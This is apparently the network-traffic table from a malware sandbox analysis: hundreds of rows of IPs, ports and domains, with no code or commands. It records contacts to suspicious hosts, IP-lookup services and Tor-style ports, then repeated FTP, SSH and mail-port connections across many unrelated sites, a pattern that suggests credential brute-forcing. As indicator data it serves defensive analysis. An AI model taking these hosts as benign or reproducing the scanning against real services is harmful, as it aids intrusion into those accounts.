| MX | 187.134.62.216:80 | cczhk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| NL | 95.142.206.3:443 | tcp | |
| NL | 95.142.206.2:443 | tcp | |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| NL | 95.142.206.3:443 | tcp | |
| NL | 95.142.206.1:443 | tcp | |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | tcp | |
| NL | 95.142.206.1:443 | tcp | |
| HK | 154.92.15.189:443 | ji.alie3ksggg.com | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| GB | 146.75.72.193:443 | tcp | |
| NL | 45.15.156.229:80 | 45.15.156.229 | tcp |
| RU | 193.233.132.67:50505 | tcp | |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| NL | 45.15.156.60:12050 | tcp | |
| NL | 45.15.156.229:80 | tcp | |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| NL | 91.92.245.15:80 | tcp | |
| US | 8.8.8.8:53 | 120.85.215.91.in-addr.arpa | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| RU | 87.240.132.72:443 | vk.com | tcp |
| DE | 185.172.128.19:80 | tcp | |
| FR | 91.121.160.6:9001 | tcp | |
| DE | 185.172.128.109:80 | 185.172.128.109 | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 104.21.17.48:443 | tcp | |
| NL | 195.20.16.46:80 | tcp | |
| DE | 88.99.68.228:9001 | tcp | |
| RU | 5.42.65.31:48396 | tcp | |
| DE | 185.172.128.19:80 | tcp | |
| DE | 159.69.27.103:9001 | tcp | |
| HK | 154.92.15.189:443 | ji.alie3ksggg.com | tcp |
| US | 172.67.173.86:80 | tcp | |
| DE | 88.99.68.228:9001 | tcp | |
| DE | 185.172.128.19:80 | tcp | |
| US | 8.8.8.8:53 | trmpc.com | udp |
| DE | 159.69.27.103:9001 | tcp | |
| MX | 189.232.10.46:80 | trmpc.com | tcp |
| DE | 185.172.128.79:80 | 185.172.128.79 | tcp |
| US | 188.114.96.2:443 | pavementpreferencewjiao.site | tcp |
| DE | 138.201.125.92:15647 | tcp | |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| DE | 185.172.128.90:80 | tcp | |
| AT | 5.42.64.33:80 | tcp | |
| HK | 154.92.15.189:80 | ji.alie3ksggg.com | tcp |
| US | 104.21.1.205:443 | tcp | |
| US | 8.8.8.8:53 | mixlr.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 54.72.168.179:22 | mixlr.com | tcp |
| IE | 209.85.203.84:22 | accounts.google.com | tcp |
| IE | 54.72.168.179:21 | mixlr.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 54.72.168.179:443 | mixlr.com | tcp |
| IE | 209.85.203.84:21 | accounts.google.com | tcp |
| GB | 109.228.39.125:22 | portal.yabatech.edu.ng | tcp |
| GB | 109.228.39.125:21 | portal.yabatech.edu.ng | tcp |
| US | 188.114.97.2:443 | pavementpreferencewjiao.site | tcp |
| GB | 3.9.234.235:21 | events.crowdsense.ai | tcp |
| GB | 3.9.234.235:22 | events.crowdsense.ai | tcp |
| GB | 109.228.39.125:443 | portal.yabatech.edu.ng | tcp |
| US | 104.20.249.29:22 | nairaland.com | tcp |
| GB | 3.9.234.235:443 | events.crowdsense.ai | tcp |
| US | 104.16.216.241:22 | login.arduino.cc | tcp |
| US | 104.20.249.29:21 | nairaland.com | tcp |
| GB | 109.228.39.125:143 | portal.yabatech.edu.ng | tcp |
| GB | 109.228.39.125:80 | portal.yabatech.edu.ng | tcp |
| IE | 209.85.203.27:465 | aspmx.l.google.com | tcp |
| NL | 142.250.153.14:465 | alt2.gmr-smtp-in.l.google.com | tcp |
| NL | 142.250.153.14:143 | alt2.gmr-smtp-in.l.google.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| US | 104.16.216.241:21 | login.arduino.cc | tcp |
| GB | 159.65.55.83:22 | blynk.cloud | tcp |
| US | 104.20.249.29:443 | nairaland.com | tcp |
| IE | 34.241.144.232:22 | mixlr.com | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 34.241.144.232:21 | mixlr.com | tcp |
| IE | 209.85.203.27:143 | aspmx.l.google.com | tcp |
| GB | 3.9.234.235:143 | events.crowdsense.ai | tcp |
| IE | 54.72.168.179:80 | mixlr.com | tcp |
| NL | 142.250.153.14:995 | alt2.gmr-smtp-in.l.google.com | tcp |
| IE | 54.72.168.179:80 | mixlr.com | tcp |
| US | 104.16.216.241:443 | login.arduino.cc | tcp |
| GB | 159.65.55.83:21 | blynk.cloud | tcp |
| IE | 209.85.203.27:995 | aspmx.l.google.com | tcp |
| US | 104.20.249.29:80 | nairaland.com | tcp |
| GB | 109.228.39.125:21 | portal.yabatech.edu.ng | tcp |
| GB | 109.228.39.125:995 | portal.yabatech.edu.ng | tcp |
| GB | 109.228.39.125:465 | portal.yabatech.edu.ng | tcp |
| GB | 3.9.234.235:465 | events.crowdsense.ai | tcp |
| US | 8.8.8.8:53 | 83.55.65.159.in-addr.arpa | udp |
| US | 162.159.205.19:143 | route2.mx.cloudflare.net | tcp |
| US | 104.16.216.241:143 | login.arduino.cc | tcp |
| GB | 109.228.39.125:80 | portal.yabatech.edu.ng | tcp |
| GB | 159.65.55.83:443 | blynk.cloud | tcp |
| US | 104.21.83.138:443 | paperambiguonusphoterew.site | tcp |
| GB | 18.169.144.79:21 | events.crowdsense.ai | tcp |
| US | 50.28.59.161:22 | dash.studentsearncash.co | tcp |
| US | 172.67.18.142:22 | nairaland.com | tcp |
| US | 162.159.205.19:465 | route2.mx.cloudflare.net | tcp |
| IE | 52.211.67.174:22 | mixlr.com | tcp |
| US | 162.159.205.19:995 | route2.mx.cloudflare.net | tcp |
| US | 172.67.18.142:21 | nairaland.com | tcp |
| IE | 52.211.67.174:21 | mixlr.com | tcp |
| GB | 18.169.144.79:22 | events.crowdsense.ai | tcp |
| IE | 209.85.203.27:143 | aspmx.l.google.com | tcp |
| US | 104.26.14.213:22 | forum.mobilism.org | tcp |
| US | 104.26.14.213:21 | forum.mobilism.org | tcp |
| US | 104.26.14.213:443 | forum.mobilism.org | tcp |
| US | 45.63.12.217:22 | school.wvbs.org | tcp |
| US | 104.16.217.241:22 | login.arduino.cc | tcp |
| GB | 109.228.39.125:443 | portal.yabatech.edu.ng | tcp |
| GB | 3.9.234.235:995 | events.crowdsense.ai | tcp |
| US | 104.16.216.241:465 | login.arduino.cc | tcp |
| GB | 3.9.234.235:80 | events.crowdsense.ai | tcp |
| US | 104.16.216.241:80 | login.arduino.cc | tcp |
| GB | 109.228.39.125:143 | portal.yabatech.edu.ng | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 104.20.248.29:22 | nairaland.com | tcp |
| GB | 18.169.144.79:143 | events.crowdsense.ai | tcp |
| US | 50.28.59.161:443 | dash.studentsearncash.co | tcp |
| US | 50.28.59.161:21 | dash.studentsearncash.co | tcp |
| US | 172.67.18.142:443 | nairaland.com | tcp |
| US | 199.192.21.225:21 | hub360.com.ng | tcp |
| US | 199.192.21.225:22 | hub360.com.ng | tcp |
| US | 104.16.217.241:21 | login.arduino.cc | tcp |
| US | 104.20.248.29:21 | nairaland.com | tcp |
| US | 104.26.14.213:143 | forum.mobilism.org | tcp |
| GB | 3.9.234.235:80 | events.crowdsense.ai | tcp |
| GB | 109.228.39.125:22 | portal.yabatech.edu.ng | tcp |
| GB | 18.169.144.79:465 | events.crowdsense.ai | tcp |
| GB | 109.228.39.125:21 | portal.yabatech.edu.ng | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 54.72.168.179:443 | mixlr.com | tcp |
| IE | 209.85.203.27:465 | aspmx.l.google.com | tcp |
| US | 199.192.21.225:443 | hub360.com.ng | tcp |
| GB | 159.65.55.83:80 | blynk.cloud | tcp |
| GB | 159.65.55.83:22 | blynk.cloud | tcp |
| IE | 54.72.168.179:443 | mixlr.com | tcp |
| US | 104.16.217.241:143 | login.arduino.cc | tcp |
| GB | 13.224.222.27:22 | skills.shawacademy.com | tcp |
| US | 104.26.14.213:465 | forum.mobilism.org | tcp |
| US | 104.16.216.241:80 | login.arduino.cc | tcp |
| US | 104.26.14.213:80 | forum.mobilism.org | tcp |
| US | 199.192.21.225:143 | hub360.com.ng | tcp |
| US | 162.159.205.19:143 | route2.mx.cloudflare.net | tcp |
| US | 104.26.15.213:22 | forum.mobilism.org | tcp |
| US | 104.26.15.213:21 | forum.mobilism.org | tcp |
| IE | 209.85.203.27:995 | aspmx.l.google.com | tcp |
| GB | 13.224.222.27:443 | skills.shawacademy.com | tcp |
| GB | 159.65.55.83:80 | blynk.cloud | tcp |
| US | 147.182.180.139:143 | mx156.hostedmxserver.com | tcp |
| US | 45.63.12.217:21 | school.wvbs.org | tcp |
| GB | 109.228.39.125:443 | portal.yabatech.edu.ng | tcp |
| GB | 13.224.222.27:21 | skills.shawacademy.com | tcp |
| US | 45.63.12.217:443 | school.wvbs.org | tcp |
| US | 162.159.205.19:465 | route2.mx.cloudflare.net | tcp |
| US | 104.26.14.213:995 | forum.mobilism.org | tcp |
| US | 147.182.180.139:465 | mx156.hostedmxserver.com | tcp |
| GB | 18.169.144.79:995 | events.crowdsense.ai | tcp |
| US | 104.16.217.241:465 | login.arduino.cc | tcp |
| US | 173.239.5.6:22 | h5.stepworkstime.com | tcp |
| US | 104.16.216.241:995 | login.arduino.cc | tcp |
| US | 104.26.15.213:143 | forum.mobilism.org | tcp |
| US | 173.239.5.6:21 | h5.stepworkstime.com | tcp |
| US | 64.225.16.22:22 | ny3.blynk.cloud | tcp |
| US | 199.192.21.225:465 | hub360.com.ng | tcp |
| US | 172.67.18.142:443 | nairaland.com | tcp |
| US | 162.159.205.19:995 | route2.mx.cloudflare.net | tcp |
| IE | 54.72.168.179:22 | mixlr.com | tcp |
| US | 50.28.59.161:80 | dash.studentsearncash.co | tcp |
| IE | 54.72.168.179:21 | mixlr.com | tcp |
| GB | 109.228.39.125:80 | portal.yabatech.edu.ng | tcp |
| GB | 3.9.234.235:443 | events.crowdsense.ai | tcp |
| GB | 3.9.234.235:21 | events.crowdsense.ai | tcp |
| US | 104.16.216.241:443 | login.arduino.cc | tcp |
| US | 104.16.217.241:995 | login.arduino.cc | tcp |
| GB | 13.224.222.126:22 | skills.shawacademy.com | tcp |
| GB | 104.103.202.103:22 | help.steampowered.com | tcp |
| US | 8.8.8.8:53 | lon1.blynk.cloud | udp |
| US | 104.26.14.213:80 | forum.mobilism.org | tcp |
| GB | 109.228.39.125:143 | portal.yabatech.edu.ng | tcp |
| US | 104.26.15.213:465 | forum.mobilism.org | tcp |
| US | 104.20.249.29:80 | nairaland.com | tcp |
| US | 199.192.21.225:995 | hub360.com.ng | tcp |
| US | 199.192.21.225:80 | hub360.com.ng | tcp |
| US | 50.28.59.161:80 | dash.studentsearncash.co | tcp |
| US | 45.63.12.217:143 | school.wvbs.org | tcp |
| US | 173.239.5.6:143 | h5.stepworkstime.com | tcp |
| US | 147.182.180.139:995 | mx156.hostedmxserver.com | tcp |
| US | 104.20.249.29:22 | nairaland.com | tcp |
| IE | 209.85.203.84:22 | accounts.google.com | tcp |
| GB | 3.9.234.235:22 | events.crowdsense.ai | tcp |
| US | 162.159.205.19:993 | route2.mx.cloudflare.net | tcp |
| IE | 209.85.203.84:21 | accounts.google.com | tcp |
| US | 104.16.216.241:21 | login.arduino.cc | tcp |
| IE | 209.85.203.27:465 | aspmx.l.google.com | tcp |
| US | 64.225.16.22:21 | ny3.blynk.cloud | tcp |
| GB | 159.65.55.83:21 | lon1.blynk.cloud | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 13.224.222.126:21 | skills.shawacademy.com | tcp |
| GB | 104.103.202.103:21 | help.steampowered.com | tcp |
| US | 104.20.249.29:21 | nairaland.com | tcp |
| GB | 142.250.187.243:22 | app.blokada.org | tcp |
| IE | 54.72.168.179:80 | mixlr.com | tcp |
| GB | 13.224.222.27:80 | skills.shawacademy.com | tcp |
| US | 104.26.15.213:995 | forum.mobilism.org | tcp |
| IE | 34.241.144.232:22 | mixlr.com | tcp |
| DE | 194.55.13.50:9001 | tcp | |
| NL | 164.90.197.79:465 | mx156.hostedmxserver.com | tcp |
| US | 173.239.5.6:443 | h5.stepworkstime.com | tcp |
| GB | 3.9.234.235:143 | events.crowdsense.ai | tcp |
| IE | 54.72.168.179:80 | mixlr.com | tcp |
| US | 104.16.216.241:22 | login.arduino.cc | tcp |
| US | 45.63.12.217:465 | school.wvbs.org | tcp |
| US | 45.63.12.217:80 | school.wvbs.org | tcp |
| NL | 142.250.153.14:143 | alt2.gmr-smtp-in.l.google.com | tcp |
| US | 104.26.14.213:443 | forum.mobilism.org | tcp |
| NL | 164.90.197.79:143 | mx156.hostedmxserver.com | tcp |
| US | 173.239.8.164:21 | h5.stepworkstime.com | tcp |
| IE | 209.85.203.27:143 | aspmx.l.google.com | tcp |
| GB | 109.228.39.125:21 | portal.yabatech.edu.ng | tcp |
| GB | 13.224.222.27:465 | skills.shawacademy.com | tcp |
| GB | 13.224.222.27:80 | skills.shawacademy.com | tcp |
| US | 64.225.16.22:443 | ny3.blynk.cloud | tcp |
| GB | 13.224.222.27:143 | skills.shawacademy.com | tcp |
| GB | 159.65.55.83:443 | lon1.blynk.cloud | tcp |
| IE | 52.211.67.174:22 | mixlr.com | tcp |
| US | 173.239.8.164:22 | h5.stepworkstime.com | tcp |
| NL | 164.90.197.162:465 | mx156.hostedmxserver.com | tcp |
| IE | 34.241.144.232:21 | mixlr.com | tcp |
| US | 173.239.8.164:143 | h5.stepworkstime.com | tcp |
| NL | 164.90.197.105:465 | mx156.hostedmxserver.com | tcp |
| NL | 164.90.197.143:465 | mx156.hostedmxserver.com | tcp |
| GB | 18.169.144.79:21 | events.crowdsense.ai | tcp |
| US | 147.182.130.78:465 | mx156.hostedmxserver.com | tcp |
| US | 147.182.160.18:465 | mx156.hostedmxserver.com | tcp |
| US | 104.16.217.241:21 | login.arduino.cc | tcp |
| GB | 18.169.144.79:143 | events.crowdsense.ai | tcp |
| IE | 209.85.203.27:995 | aspmx.l.google.com | tcp |
| US | 104.16.217.241:22 | login.arduino.cc | tcp |
| US | 45.63.12.217:22 | school.wvbs.org | tcp |
| US | 104.16.216.241:143 | login.arduino.cc | tcp |
| GB | 3.9.234.235:465 | events.crowdsense.ai | tcp |
| US | 45.63.12.217:995 | school.wvbs.org | tcp |
| GB | 13.224.222.126:143 | skills.shawacademy.com | tcp |
| GB | 3.9.234.235:80 | events.crowdsense.ai | tcp |
| GB | 142.250.187.243:443 | app.blokada.org | tcp |
| US | 172.67.18.142:22 | nairaland.com | tcp |
| GB | 142.250.187.243:21 | app.blokada.org | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| GB | 104.103.202.103:443 | help.steampowered.com | tcp |
| US | 104.26.14.213:22 | forum.mobilism.org | tcp |
| GB | 18.169.144.79:22 | events.crowdsense.ai | tcp |
| US | 162.159.136.232:22 | discord.com | tcp |
| GB | 13.224.222.126:465 | skills.shawacademy.com | tcp |
| US | 8.8.8.8:53 | anilist.co | udp |
| US | 172.67.18.142:21 | nairaland.com | tcp |
| GB | 13.224.222.47:143 | skills.shawacademy.com | tcp |
| US | 74.206.228.78:143 | h5.stepworkstime.com | tcp |
| GB | 104.103.202.103:143 | help.steampowered.com | tcp |
| US | 104.16.216.241:465 | login.arduino.cc | tcp |
| GB | 13.224.222.123:143 | skills.shawacademy.com | tcp |
| US | 199.192.21.225:143 | hub360.com.ng | tcp |
| GB | 109.228.39.125:465 | portal.yabatech.edu.ng | tcp |
| US | 64.225.16.22:143 | ny3.blynk.cloud | tcp |
| NL | 142.250.153.14:995 | alt2.gmr-smtp-in.l.google.com | tcp |
| US | 162.159.205.19:587 | route2.mx.cloudflare.net | tcp |
| GB | 159.65.55.83:22 | lon1.blynk.cloud | tcp |
| NL | 142.250.153.14:465 | alt2.gmr-smtp-in.l.google.com | tcp |
| GB | 109.228.39.125:80 | portal.yabatech.edu.ng | tcp |
| US | 104.26.14.213:21 | forum.mobilism.org | tcp |
| US | 50.28.59.161:22 | dash.studentsearncash.co | tcp |
| US | 147.135.64.217:443 | tcp | |
| US | 104.16.217.241:143 | login.arduino.cc | tcp |
| GB | 3.9.234.235:80 | events.crowdsense.ai | tcp |
| GB | 13.224.222.47:465 | skills.shawacademy.com | tcp |
| US | 104.26.14.213:143 | forum.mobilism.org | tcp |
| US | 199.192.21.225:80 | hub360.com.ng | tcp |
| CA | 199.58.81.140:443 | tcp | |
| GB | 109.228.39.125:995 | portal.yabatech.edu.ng | tcp |
| US | 104.20.249.29:80 | nairaland.com | tcp |
| US | 173.239.5.6:465 | h5.stepworkstime.com | tcp |
| US | 173.239.5.6:80 | h5.stepworkstime.com | tcp |
| US | 45.63.12.217:80 | school.wvbs.org | tcp |
| GB | 109.228.39.125:443 | portal.yabatech.edu.ng | tcp |
| GB | 13.224.222.27:995 | skills.shawacademy.com | tcp |
| US | 50.28.59.161:21 | dash.studentsearncash.co | tcp |
| GB | 18.169.144.79:465 | events.crowdsense.ai | tcp |
| GB | 3.9.234.235:995 | events.crowdsense.ai | tcp |
| NL | 164.90.197.79:995 | mx156.hostedmxserver.com | tcp |
| GB | 13.224.222.123:465 | skills.shawacademy.com | tcp |
| US | 162.159.136.232:21 | discord.com | tcp |
| US | 104.26.15.71:22 | anilist.co | tcp |
| GB | 109.228.39.125:222 | portal.yabatech.edu.ng | tcp |
| US | 8.8.8.8:53 | students.kuccps.net | udp |
| GB | 109.228.39.125:993 | portal.yabatech.edu.ng | tcp |
| US | 199.192.21.225:22 | hub360.com.ng | tcp |
| US | 64.225.16.22:22 | ny3.blynk.cloud | tcp |
| US | 162.159.128.233:22 | discord.com | tcp |
| GB | 104.103.202.103:465 | help.steampowered.com | tcp |
| US | 104.26.15.213:21 | forum.mobilism.org | tcp |
| GB | 13.224.222.27:22 | skills.shawacademy.com | tcp |
| IE | 209.85.203.27:465 | aspmx.l.google.com | tcp |
| US | 162.159.205.19:110 | route2.mx.cloudflare.net | tcp |
| US | 104.16.217.241:465 | login.arduino.cc | tcp |
| US | 173.239.5.6:995 | h5.stepworkstime.com | tcp |
| US | 8.8.8.8:53 | 243.187.250.142.in-addr.arpa | udp |
| DE | 64.190.63.136:80 | ww1.studentsearncash.co | tcp |
| US | 50.28.59.161:80 | dash.studentsearncash.co | tcp |
| US | 173.239.8.164:465 | h5.stepworkstime.com | tcp |
| GB | 13.224.222.126:995 | skills.shawacademy.com | tcp |
| GB | 18.169.144.79:995 | events.crowdsense.ai | tcp |
| IE | 209.85.203.27:143 | aspmx.l.google.com | tcp |
| US | 104.26.15.213:22 | forum.mobilism.org | tcp |
| US | 104.26.15.213:143 | forum.mobilism.org | tcp |
| US | 173.239.5.6:22 | h5.stepworkstime.com | tcp |
| US | 8.8.8.8:53 | students.kuccps.net | udp |
| US | 8.8.8.8:53 | pakrail.gov.pk | udp |
| US | 162.159.138.232:22 | discord.com | tcp |
| US | 172.67.71.232:22 | anilist.co | tcp |
| US | 162.159.128.233:21 | discord.com | tcp |
| US | 199.192.21.225:21 | hub360.com.ng | tcp |
| US | 64.225.16.22:465 | ny3.blynk.cloud | tcp |
| US | 199.192.21.225:80 | hub360.com.ng | tcp |
| GB | 142.250.187.243:143 | app.blokada.org | tcp |
| US | 104.16.216.241:80 | login.arduino.cc | tcp |
| IE | 209.85.203.27:995 | aspmx.l.google.com | tcp |
| US | 162.159.135.232:22 | discord.com | tcp |
| US | 104.16.216.241:995 | login.arduino.cc | tcp |
| US | 147.182.180.139:465 | mx156.hostedmxserver.com | tcp |
| US | 104.26.14.213:465 | forum.mobilism.org | tcp |
| US | 173.239.8.164:995 | h5.stepworkstime.com | tcp |
| US | 104.16.216.241:80 | login.arduino.cc | tcp |
| US | 50.28.59.161:80 | dash.studentsearncash.co | tcp |
| US | 162.159.205.19:993 | route2.mx.cloudflare.net | tcp |
| GB | 13.224.222.27:443 | skills.shawacademy.com | tcp |
| US | 162.159.137.232:22 | discord.com | tcp |
| US | 172.67.71.168:143 | forum.mobilism.org | tcp |
| GB | 13.224.222.126:22 | skills.shawacademy.com | tcp |
| GB | 109.228.39.125:21 | portal.yabatech.edu.ng | tcp |
| US | 104.26.14.71:22 | anilist.co | tcp |
| US | 162.159.138.232:21 | discord.com | tcp |
| US | 104.26.14.213:80 | forum.mobilism.org | tcp |
| US | 104.26.15.71:21 | anilist.co | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IE | 54.72.168.179:222 | mixlr.com | tcp |
| US | 64.225.16.22:80 | ny3.blynk.cloud | tcp |
| US | 104.16.217.241:995 | login.arduino.cc | tcp |
| GB | 104.103.202.103:995 | help.steampowered.com | tcp |
| KE | 197.136.130.6:22 | students.kuccps.net | tcp |
| US | 173.239.8.164:22 | h5.stepworkstime.com | tcp |
| GB | 142.250.187.243:995 | app.blokada.org | tcp |
| GB | 13.224.222.47:22 | skills.shawacademy.com | tcp |
| US | 162.159.135.232:21 | discord.com | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| GB | 104.103.202.103:80 | help.steampowered.com | tcp |
| US | 162.159.137.232:21 | discord.com | tcp |
| GB | 13.224.222.27:21 | skills.shawacademy.com | tcp |
| US | 64.225.16.22:995 | ny3.blynk.cloud | tcp |
| US | 64.225.16.22:80 | ny3.blynk.cloud | tcp |
| GB | 142.250.187.243:465 | app.blokada.org | tcp |
| GB | 13.224.222.123:22 | skills.shawacademy.com | tcp |
| GB | 142.250.187.243:80 | app.blokada.org | tcp |
| GB | 159.65.55.83:990 | lon1.blynk.cloud | tcp |
| US | 147.182.180.139:143 | mx156.hostedmxserver.com | tcp |
| US | 173.239.5.6:143 | h5.stepworkstime.com | tcp |
| NL | 164.90.197.79:465 | mx156.hostedmxserver.com | tcp |
| US | 45.63.12.217:443 | school.wvbs.org | tcp |
| GB | 159.65.55.83:80 | lon1.blynk.cloud | tcp |
| US | 74.206.228.78:22 | h5.stepworkstime.com | tcp |
| GB | 104.103.202.103:22 | help.steampowered.com | tcp |
| US | 104.26.15.213:465 | forum.mobilism.org | tcp |
| GB | 3.9.234.235:443 | events.crowdsense.ai | tcp |
| US | 172.67.71.232:21 | anilist.co | tcp |
| IE | 34.241.144.232:222 | mixlr.com | tcp |
| KE | 41.76.172.119:22 | portal.health.go.ke | tcp |
| IE | 54.72.168.179:443 | mixlr.com | tcp |
| NL | 164.90.197.162:465 | mx156.hostedmxserver.com | tcp |
| US | 45.63.12.217:143 | school.wvbs.org | tcp |
| US | 199.192.21.225:465 | hub360.com.ng | tcp |
| US | 104.16.216.241:990 | login.arduino.cc | tcp |
| US | 172.67.18.142:443 | nairaland.com | tcp |
| US | 173.239.5.6:80 | h5.stepworkstime.com | tcp |
| NL | 164.90.197.105:465 | mx156.hostedmxserver.com | tcp |
| US | 199.192.21.225:995 | hub360.com.ng | tcp |
| GB | 13.224.222.27:143 | skills.shawacademy.com | tcp |
| GB | 142.250.187.243:80 | app.blokada.org | tcp |
| US | 104.16.216.241:993 | login.arduino.cc | tcp |
| US | 173.239.5.6:80 | h5.stepworkstime.com | tcp |
| NL | 164.90.197.143:465 | mx156.hostedmxserver.com | tcp |
| GB | 13.224.222.126:21 | skills.shawacademy.com | tcp |
| US | 173.239.8.164:143 | h5.stepworkstime.com | tcp |
| GB | 3.9.234.235:993 | events.crowdsense.ai | tcp |
| US | 147.182.130.78:465 | mx156.hostedmxserver.com | tcp |
| GB | 142.250.187.243:22 | app.blokada.org | tcp |
| US | 162.159.205.19:587 | route2.mx.cloudflare.net | tcp |
| US | 147.182.160.18:465 | mx156.hostedmxserver.com | tcp |
| US | 147.182.189.184:465 | mx156.hostedmxserver.com | tcp |
| US | 104.26.14.213:995 | forum.mobilism.org | tcp |
| IE | 209.85.203.84:990 | accounts.google.com | tcp |
| NL | 142.250.153.14:587 | alt2.gmr-smtp-in.l.google.com | tcp |
| US | 147.182.180.139:995 | mx156.hostedmxserver.com | tcp |
| GB | 159.65.55.83:80 | lon1.blynk.cloud | tcp |
| US | 173.239.5.6:21 | h5.stepworkstime.com | tcp |
| IE | 209.85.203.27:993 | aspmx.l.google.com | tcp |
| GB | 18.169.144.79:993 | events.crowdsense.ai | tcp |
| US | 173.239.8.164:21 | h5.stepworkstime.com | tcp |
| PK | 43.250.84.104:22 | pakrail.gov.pk | tcp |
| US | 162.159.205.19:110 | route2.mx.cloudflare.net | tcp |
| US | 74.206.228.78:21 | h5.stepworkstime.com | tcp |
| US | 74.206.228.78:143 | h5.stepworkstime.com | tcp |
| US | 104.16.217.241:993 | login.arduino.cc | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 104.26.15.71:443 | anilist.co | tcp |
| IE | 209.85.203.27:143 | aspmx.l.google.com | tcp |
| KE | 41.76.172.119:21 | portal.health.go.ke | tcp |
| GB | 109.228.39.125:80 | portal.yabatech.edu.ng | tcp |
| IE | 209.85.203.27:110 | aspmx.l.google.com | tcp |
| US | 104.20.249.29:222 | nairaland.com | tcp |
| US | 172.67.18.142:443 | nairaland.com | tcp |
| US | 199.192.21.225:80 | hub360.com.ng | tcp |
| GB | 3.9.234.235:222 | events.crowdsense.ai | tcp |
| GB | 13.224.222.27:465 | skills.shawacademy.com | tcp |
| IE | 209.85.203.27:587 | aspmx.l.google.com | tcp |
| KE | 197.136.130.6:21 | students.kuccps.net | tcp |
| US | 104.16.216.241:222 | login.arduino.cc | tcp |
| US | 50.28.59.161:222 | dash.studentsearncash.co | tcp |
| US | 104.20.249.29:80 | nairaland.com | tcp |
| US | 104.26.14.213:80 | forum.mobilism.org | tcp |
| IE | 209.85.203.84:222 | accounts.google.com | tcp |
| US | 45.63.12.217:465 | school.wvbs.org | tcp |
| NL | 142.250.153.14:993 | alt2.gmr-smtp-in.l.google.com | tcp |
| US | 64.225.16.22:21 | ny3.blynk.cloud | tcp |
| US | 104.20.249.29:990 | nairaland.com | tcp |
| US | 199.192.21.225:990 | hub360.com.ng | tcp |
| US | 8.8.8.8:53 | parsec.app | udp |
| US | 64.225.16.22:143 | ny3.blynk.cloud | tcp |
| US | 45.63.12.217:22 | school.wvbs.org | tcp |
| US | 104.26.14.213:222 | forum.mobilism.org | tcp |
| IE | 209.85.203.84:80 | accounts.google.com | tcp |
| IE | 209.85.203.27:465 | aspmx.l.google.com | tcp |
| US | 162.159.136.232:80 | discord.com | tcp |
| GB | 3.9.234.235:587 | events.crowdsense.ai | tcp |
| US | 45.63.12.217:995 | school.wvbs.org | tcp |
| KE | 197.136.130.6:443 | students.kuccps.net | tcp |
| US | 104.16.216.241:587 | login.arduino.cc | tcp |
| US | 50.28.59.161:990 | dash.studentsearncash.co | tcp |
| GB | 142.250.187.243:21 | app.blokada.org | tcp |
| IE | 54.72.168.179:80 | mixlr.com | tcp |
| US | 104.16.216.241:443 | login.arduino.cc | tcp |
| US | 162.159.205.19:220 | route2.mx.cloudflare.net | tcp |
| US | 104.26.15.213:222 | forum.mobilism.org | tcp |
| US | 8.8.8.8:53 | 71.15.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.172.76.41.in-addr.arpa | udp |
| US | 172.67.71.168:222 | forum.mobilism.org | tcp |
| US | 162.159.136.232:22 | discord.com | tcp |
| KE | 41.76.172.119:443 | portal.health.go.ke | tcp |
| US | 199.192.21.225:80 | ftp.hub360.com.ng | tcp |
| IE | 209.85.203.27:995 | aspmx.l.google.com | tcp |
| US | 104.26.14.213:990 | forum.mobilism.org | tcp |
| US | 34.149.236.64:143 | mxa.mailgun.org | tcp |
| US | 50.28.59.161:80 | dash.studentsearncash.co | tcp |
| GB | 109.228.39.125:990 | portal.yabatech.edu.ng | tcp |
| GB | 13.224.222.27:80 | skills.shawacademy.com | tcp |
| GB | 109.228.39.125:110 | portal.yabatech.edu.ng | tcp |
| US | 104.16.216.241:110 | login.arduino.cc | tcp |
| GB | 13.224.222.27:222 | skills.shawacademy.com | tcp |
| GB | 13.224.222.27:80 | skills.shawacademy.com | tcp |
| US | 104.16.217.241:110 | login.arduino.cc | tcp |
| GB | 109.228.39.125:993 | portal.yabatech.edu.ng | tcp |
| US | 104.26.15.71:80 | anilist.co | tcp |
| US | 199.192.21.225:222 | ftp.hub360.com.ng | tcp |
| GB | 104.103.202.103:143 | help.steampowered.com | tcp |
| GB | 13.224.222.126:222 | skills.shawacademy.com | tcp |
| GB | 13.224.222.47:222 | skills.shawacademy.com | tcp |
| US | 162.159.205.19:25 | route2.mx.cloudflare.net | tcp |
| US | 147.182.180.139:993 | mx156.hostedmxserver.com | tcp |
| US | 104.26.14.213:443 | forum.mobilism.org | tcp |
| GB | 13.224.222.123:222 | skills.shawacademy.com | tcp |
| GB | 142.250.187.243:443 | app.blokada.org | tcp |
| GB | 159.65.55.83:443 | lon1.blynk.cloud | tcp |
| US | 34.149.236.64:995 | mxa.mailgun.org | tcp |
| KE | 197.136.130.6:22 | students.kuccps.net | tcp |
| US | 162.159.205.17:25 | route2.mx.cloudflare.net | tcp |
| NL | 164.90.197.79:993 | mx156.hostedmxserver.com | tcp |
